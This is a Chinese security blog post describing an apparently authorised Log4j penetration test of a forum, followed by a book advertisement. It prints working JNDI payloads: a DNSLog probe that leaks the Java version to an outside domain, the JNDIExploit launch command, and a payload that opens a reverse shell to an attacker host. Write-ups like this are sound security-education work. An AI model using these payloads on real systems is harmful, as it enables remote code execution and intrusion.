✎ 阅读须知

乌鸦安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限，如转载或传播此文章，需保证文章的完整性，未经允许，禁止转载！

本文所提供的工具仅用于学习，禁止用于其他，请在24小时内删除工具文件！！！

在去年log4j漏洞刚爆发的时候，很多平台都存在漏洞，当时也在第一时间在有授权的情况下对某论坛进行了渗透测试，结果发现存在漏洞，报告之后，漏洞也被很快修复。

本次对该渗透过程进行一个简单的记录，整个过程非常的简单，因为漏洞刚出来，也没有什么waf，所以很快就拿下了。

以下过程已进行脱敏，漏洞均已修复。

1. Dnslog漏洞探测

云端攻击机kali ： 1x.xxx.xx2.9
目标机：http://xxx.cn/
中转文件：JNDIExploit-1.2-SNAPSHOT.jar

1.1 payload描述

在log4j漏洞中，一般构造诸如：${jndi:ldap://6bbs.dnslog.cn/test}之类的漏洞。

但是在很多时候，因为有//的存在，可能会触发系统自动将其作为url链接访问，导致误判，因此在这里可以使用新的payload进行测试：

${jndi:ldap://${sys:java.version}.335h25.dnslog.cn}

在这里可以显示版本信息，如果能够显示，则证明一定存在漏洞。

1.2 测试

去dnslog平台申请一个域名：

gx.dnslog.cn

直接构造：

${jndi:ldap://${sys:java.version}.gx.dnslog.cn}

然后在论坛的搜索框执行：

此时DNSLOG平台有数据，证明存在漏洞：

既然存在漏洞，那就试试能否拿下RCE。

2. log4j RCE

云端攻击机kali ： 1x3.xxx.xx2.9
目标机：http://xxx.com/
中转文件：JNDIExploit-1.2-SNAPSHOT.jar

2.1 准备工作

直接在攻击机上开启JNDIExploit-1.2-SNAPSHOT.jar
命令如下：

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 攻击机ip地址

${jndi:ldap://攻击机ip:1389/Basic/ReverseShell/攻击机ip/7777}

其中，去请求攻击机的的1389端口，并且将shell反弹给攻击机的7777端口。

在攻击机上另启一个命令行，监听7777端口：

此时状态如下：

2.2 攻击测试

直接在输入框里面输入上面构造好的exp：

直接回车，shell就弹回来了：

cat /proc/1/cgroup

此时显示为物理机。

测试结束，开始写报告。

3. 漏洞修复

https://mp.weixin.qq.com/s/O22KoaKFE11dmAR3DVPqBQ

新书推荐

《大数据导论》

    

本书围绕新工科背景下大数据人才培养需求编写，系统介绍了大数据采集与预处理、大数据存储与管理、大数据处理与分析、大数据可视化处理流程；重点分析了科大讯飞大数据平台在政务、交通、金融和用户画像等实际场景中的应用，还介绍了大数据实验环境的详细搭建步骤；最后介绍了大数据治理中法律政策、行业标准建设的最新进展，分析了大数据可能带来的伦理风险和应对策略。

本书将大数据基础理论与实际案例结合，辅以编程实践和有针对性的课后习题，可作为高等院校相关专业的导论课教材，也可作为大数据相关从业人员技术参考书。

点击上方链接，更多优惠等你哦~

tips：加我wx，拉你入群，一起学习

扫取二维码获取

更多精彩

乌鸦安全

原文始发于微信公众号（乌鸦安全）：一次简单的log4j漏洞测试